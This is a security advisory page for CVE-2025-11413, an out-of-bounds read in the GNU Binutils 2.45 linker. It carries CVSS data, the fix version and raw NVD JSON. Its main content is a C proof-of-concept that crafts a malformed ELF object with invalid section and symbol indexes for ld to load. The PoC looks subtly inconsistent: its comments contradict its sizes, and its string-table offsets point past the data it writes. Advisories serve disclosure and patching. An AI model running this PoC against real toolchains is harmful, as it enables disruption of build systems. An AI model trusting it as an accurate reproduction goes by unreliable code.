Security Vulnerability Report
CVE-2025-11413 CVSS 3.3 LOW

CVE-2025-11413

Published: 2025-10-07 22:15:34
Last Modified: 2026-05-12 13:16:29

Description

A vulnerability was found in GNU Binutils 2.45. It affects the function elf_link_add_object_symbols in the file bfd/elflink.c of the Linker component. The manipulation results in an out-of-bounds read. The attack requires local access. The exploit has been made public and could be used. Upgrading to version 2.46 addresses this issue. The patch is identified as 72efdf166aa0ed72ecc69fc2349af6591a7a19c0. Upgrading the affected component is advised.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils < 2.46
GNU Binutils 2.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2025-11413 PoC - GNU Binutils elf_link_add_object_symbols OOB Read
 * This PoC demonstrates triggering an out-of-bounds read in the linker
 * by crafting a malicious ELF object file with corrupted section headers.
 *
 * Usage: gcc -o poc poc.c && ./poc && ld crafted_malicious.o
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <elf.h>
#include <fcntl.h>
#include <unistd.h>

/* Create a minimal malicious ELF object file with corrupted
 * symbol table section headers to trigger OOB read in
 * elf_link_add_object_symbols() in bfd/elflink.c
 */
int create_malicious_elf(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp)
        return -1;

    /* ELF64 header */
    Elf64_Ehdr ehdr;
    memset(&ehdr, 0, sizeof(ehdr));
    ehdr.e_ident[0] = 0x7f;
    ehdr.e_ident[1] = 'E';
    ehdr.e_ident[2] = 'L';
    ehdr.e_ident[3] = 'F';
    ehdr.e_ident[4] = ELFCLASS64;
    ehdr.e_ident[5] = ELFDATA2LSB;
    ehdr.e_ident[6] = EV_CURRENT;
    ehdr.e_type = ET_REL;            /* Relocatable file */
    ehdr.e_machine = EM_X86_64;
    ehdr.e_version = EV_CURRENT;
    ehdr.e_ehsize = sizeof(Elf64_Ehdr);
    ehdr.e_shentsize = sizeof(Elf64_Shdr);
    ehdr.e_shnum = 4;                /* NULL + .symtab + .strtab + .shstrtab */
    ehdr.e_shstrndx = 3;
    /* Section headers start after ELF header */
    ehdr.e_shoff = sizeof(Elf64_Ehdr);
    fwrite(&ehdr, sizeof(ehdr), 1, fp);

    /* Section headers with corrupted symbol table info */
    Elf64_Shdr shdrs[4];
    memset(shdrs, 0, sizeof(shdrs));

    /* Section data follows the ELF header and the four section headers
     * (64 + 4 * 64 = 320 bytes), so no padding is needed before it. */
    const Elf64_Off data_off = sizeof(Elf64_Ehdr) + sizeof(shdrs);

    /* SHT_NULL */
    shdrs[0].sh_type = SHT_NULL;

    /* .symtab - crafted with invalid sh_link and sh_info to trigger OOB */
    shdrs[1].sh_type = SHT_SYMTAB;
    shdrs[1].sh_offset = data_off;
    shdrs[1].sh_size = 64;           /* Small size but large number of entries */
    shdrs[1].sh_link = 0xFFFF;       /* Invalid section index */
    shdrs[1].sh_info = 0xFFFF;       /* Invalid - causes OOB read */
    shdrs[1].sh_entsize = sizeof(Elf64_Sym);

    /* .strtab */
    shdrs[2].sh_type = SHT_STRTAB;
    shdrs[2].sh_offset = data_off + 64;
    shdrs[2].sh_size = 16;

    /* .shstrtab */
    shdrs[3].sh_type = SHT_STRTAB;
    shdrs[3].sh_offset = data_off + 80;
    shdrs[3].sh_size = 32;

    fwrite(shdrs, sizeof(shdrs), 1, fp);

    /* Crafted symbol table entries - intentionally malformed */
    Elf64_Sym syms[2];
    memset(syms, 0, sizeof(syms));
    syms[0].st_name = 1;
    syms[0].st_info = STB_GLOBAL << 4;
    syms[0].st_shndx = SHN_UNDEF;
    syms[1].st_name = 5;
    syms[1].st_info = STB_GLOBAL << 4;
    syms[1].st_shndx = 0xFFFE;       /* Invalid section index */
    fwrite(syms, sizeof(syms), 1, fp);

    fclose(fp);
    return 0;
}

int main(void)
{
    printf("[*] CVE-2025-11413 PoC - GNU Binutils OOB Read\n");
    printf("[*] Creating malicious ELF object file...\n");

    if (create_malicious_elf("crafted_malicious.o") != 0) {
        fprintf(stderr, "[-] Failed to create malicious ELF\n");
        return 1;
    }

    printf("[+] Malicious ELF created: crafted_malicious.o\n");
    printf("[*] Run: ld crafted_malicious.o to trigger the vulnerability\n");
    printf("[*] Expected: OOB read in elf_link_add_object_symbols()\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11413", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.230", "lastModified": "2026-05-12T13:16:28.693", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in GNU Binutils 2.45. Affected is the function elf_link_add_object_symbols of the file bfd/elflink.c of the component Linker. The manipulation results in out-of-bounds read. The attack needs to be approached locally. The exploit has been made public and could be used. Upgrading to version 2.46 is able to address this issue. The patch is identified as 72efdf166aa0ed72ecc69fc2349af6591a7a19c0. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", 
"description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16362", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33456#c10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=72efdf166aa0ed72ecc69fc2349af6591a7a19c0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327349", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327349", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB E ... (truncated)